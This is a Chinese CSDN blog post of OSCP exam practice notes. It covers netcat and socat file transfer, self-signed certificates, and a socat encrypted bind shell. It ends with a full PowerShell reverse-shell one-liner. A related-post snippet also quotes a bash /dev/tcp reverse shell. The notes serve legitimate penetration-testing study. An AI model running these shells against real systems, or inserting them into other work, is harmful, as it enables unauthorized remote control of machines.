【Oscp练习】

最新推荐文章于 2024-06-16 13:15:43 发布
最新推荐文章于 2024-06-16 13:15:43 发布
阅读量201 收藏 1
点赞数
文章标签: https ssl 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44126257/article/details/129016279
版权

1、下载指定IP的页面

curl -o -X http://XXXX
-o/--output                           把输出写到该文件中
-O/--remote-name                      把输出写到该文件中,保留远程文件的文件名
-x/--proxy <host[:port]>              在给定的端口上使用HTTP代理

2、HISTTIMEFORMAT控制历史命令输出中的日期和/或时间戳

export HISTTIMEFORMAT='%F %T '

3、NC监听相关

-n选项禁用 DNS 名称解析
-l创建侦听器
-v添加一些冗长
-p 指定侦听端口号

4、NC传输文件(单向连接)

 发送端:nc -lvp 1111 < test.txt
 接收端:nc XXX.XX 1111 > test.txt

5、Socat 文件传输

sudo socat TCP4-LISTEN:443,fork file:XXXX.txt
  TCP4-LISTEN选项指定一个IPv4 侦听器
  一旦与侦听器建立连接,fork就会创建一个子进程,它允许多个连接
  文件:指定要传输的文件的名称:

6、Socat访问

加密访问:socat - OPENSSL:XXX.X:XX,verify=0

7、openssl应用程序使用以下选项创建自签名证书

-req : 发起新的证书签名请求   
-newkey : 生成一个新的私钥 rsa:2048:使用密钥长度为 2048 位的 RSA 加密
-nodes:存储没有密码保护的私钥
-keyout:将密钥保存到文件
-x509:输出自签名证书而不是证书请求
-days : 以天为单位设置有效期
-out : 将证书保存到文件

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt

8、Socat 加密绑定 Shell

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt

cat bind_shell.key bind_shell.crt > bind_shell.pem

   使用OPENSSL-LISTEN选项在端口 443 上创建侦听器,cert=bind_shell.pem指定我们的证书文件,禁用 SSL 验证,
并在与侦听器建立连接后派生一个子进程

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

socat - OPENSSL:XX.XX,verify=0

9、PowerShell 反向 Shell

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('XX.XX.X.X',port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
一只闯入网安的小白兔
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
1-OSCP自学笔记-October靶机练习1
08-04
OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机。靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
OSCP网络安全认证
10-19
- **参加培训**:Offensive Security提供的付费课程"Penetration Testing with Kali Linux"(PWK)提供深入的指导和靶场练习。 - **加入社区**:参与OSCP考生和持证人的论坛讨论,分享经验和技巧。 ### OSCP认证的...
OSCP证书考试总结与终身学习 - 带你走上 OSCE3
热门推荐
0pr
08-25 1万+
终于有点时间写些东西了。这半年来一直在准备 Offensive Security 的各种考试,内容太多。直到昨天,也就是8月24日,我完成了第二轮 OSEP 的 Lab,心里踏实多了,等着9月4日考试的同时,也想做个小结,谈谈我拿 OSCP 的历程以及今后的目标。希望可以为想考取 OSCP 的同学指明一些道路。
一文带你了解OSCP 2024
最新发布
白帽黑客佳哥的博客
06-16 1656
我们先说说,OSCP 是什么?OSCP (Offensive Security Certified Professional)是 Offensive Security (该公司开发和维护着 KALI Linux,以下简称 Offsec)推出的体系非常完善,对于非3年以上渗透工作经验人员来说难度非常高,理论兼实操(更重实操),是业界最知名的渗透测试专业证书。如果大家对网络、主机渗透、红队感兴趣的,这是大家的第一步。考试有三台单独考试靶机和一套域环境(三台机器)三台单独机器,每台20分;
oscp练习目录
王嘟嘟的博客
01-25 1万+
0x00 前言 这里将oscp所做的练习进行一个总结,并且将每一个题所需要的内容以及可以练习学习到的东西进行汇总。 0x01 vulnhub总览 题目 链接 文章链接 Me and My Girlfriend 1 https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ https://blog.csdn.net/qq_36...
网络安全攻防界的OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS
jennycisp的博客
08-10 2556
关注网络安全攻防领域的筒子们,肯定对OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS不陌生,但是关于他们直减的区别,今儿想做个分享。
OSCP学习笔记总结(本资料禁止转载)
Shadow的博客
10-19 1万+
OSCP学习笔记 第零章实战学习 反弹shell bash -i >&/dev/tcp/192.168.1.1/4444 0>&1 切换交互式shell python -c 'import pty;pty.spawn("/bin/sh")' 查看系统型号:lab_release -a 查看系统版本:uname -a 查看目标主机网页内容:dirb http://192.168.1.1:80 查看网页漏洞:nikto -h 192.168.1.1 --useprox.
OSCP:OSCP考试材料
05-01
【压缩包子文件的文件名称列表】"OSCP-master"可能是一个包含整个OSCP学习路径的资料库,通常这样的资源会包含练习环境配置指南、漏洞分析文档、渗透测试工具介绍、靶机复现教程等。"master"一词可能意味着这是一个...
OSCP-PREP
03-18
"OSCP-PREP-master"压缩包中的内容可能包括教程文档、实战练习、代码示例等,这些都是备考的重要参考资料。考生可以通过阅读文档来学习理论知识,通过实战练习来提高动手能力,通过查看代码示例来理解和掌握Python在...
OSCP LABS TO PRACTICE 2023.pdf
10-06
以下是一些推荐的学习路径和实战练习,适合准备OSCP认证或希望加强渗透测试能力的人。 1. **TRY HACK ME ROOMS TO OSCP Jr PenTester** (Step 1): 这是初级渗透测试者的起点,提供了基础的网络安全和渗透测试概念,...
oscp学习(一)
qq_48514193的博客
02-20 1694
oscp
废物日记之新版oscp通关历程
m0_53302733的博客
07-27 2508
oscp
OSCP认证考试指南
一杯咖啡的渗透记忆
02-24 6338
简介 第一节: 考试要求 文档要求 Exploit 代码 考试证据 控制面板提交 截图要求 考试限制 Metasploit 限制 第二节:考试信息 考试网络连接 考试控制板 靶机快照恢复 考试中proof文件 分值分配 取消得分 建议使用的报告模板 奖励积分 网络连接问题 联系方式 第三节:提交说明 提交格式和名称 压缩文件 提交上传 收到确认书 其他必要信息 结果 第四节 常见问题
2024年网络安全笔记day01
2401_84253132的博客
05-03 1088
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!2、选择vmnet0网卡(桥接网卡),这步的意思就是将虚拟机的网卡连接到vmnet0交换机上。最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。
OSCP Potato靶机 超详细教学
m0_52545432的博客
05-06 367
nmap直接开扫-p- 全端口扫描-A 表示 aggressive,可以理解为全面扫描80 http协议22 ssh协议2112 FTP协议2112放了一个FTP,可以通过默认的用户名登录进去,用户名为anonymous 密码随便填由于不是默认的端口,所以ftp登录时需要指定一下端口,命令为230说明匿名登录成功binary 以二进制模式传输文件,保证文件完整get命令下载文件到桌面一段php代码,应该是登录页面的备份,固定了用户名是admin另外一个文件是。
OSCP备考-3
一个安全路上的菜鸟
12-01 938
Windows 篇 这个简单 一个漏洞解决.我用过的kali 64位的不知道怎回事一直利用不成功 (ms08-067) 这个一看名字blue。永恒之蓝 ms17-010 上来就是nmap 一波 root@kali:~/Desktop/dirsearch# nmap -sV -Pn -T4 10.10.10.5 Starting Nmap 7.80 ( https://nmap.org ) ...
socat
喝醉酒的小白
04-23 1066
socat 是一款功能强大的网络工具,它可以在不同的网络连接之间建立数据通道,支持多种协议的转换和连接,可以用于网络调试、端口转发、数据加密等多种场景。 下面是一些常用的 socat 命令示例: 端口转发 将本地的 8080 端口转发到远程服务器的 80 端口: socat TCP-LISTEN:8080,fork TCP:remote-server:80 文件传输 将本地文件传输到远程服务器: socat FILE:/path/to/local/file TCP:remote-server:12
oscp—Me and My Girlfriend 1练习
王嘟嘟的博客
01-12 1262
0x00 前言 为oscp做准备的练习,Me and My Girlfriend 1。由于不知道怎么练习,就随便下载了一个进行练习在这里做一个笔记。 0x01 实验 下载好文件之后,配置为NET模式。 1.目标探测 探测这里使用了nmap进行探测,可以看到时间为10.4秒。 nmap -sP -T4 192.168.25.1/24 这里也可以使用masscan 进行扫描,可以明显感觉速度变快了...
oscp relia
12-21
OSCP(Offensive Security Certified Professional)是一种信息安全认证,它着重于渗透测试和攻击技术。OSCP认证考试涵盖了网络渗透测试、漏洞利用、社会工程学和渗透测试工具的使用等内容。持有OSCP认证的专业人员...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值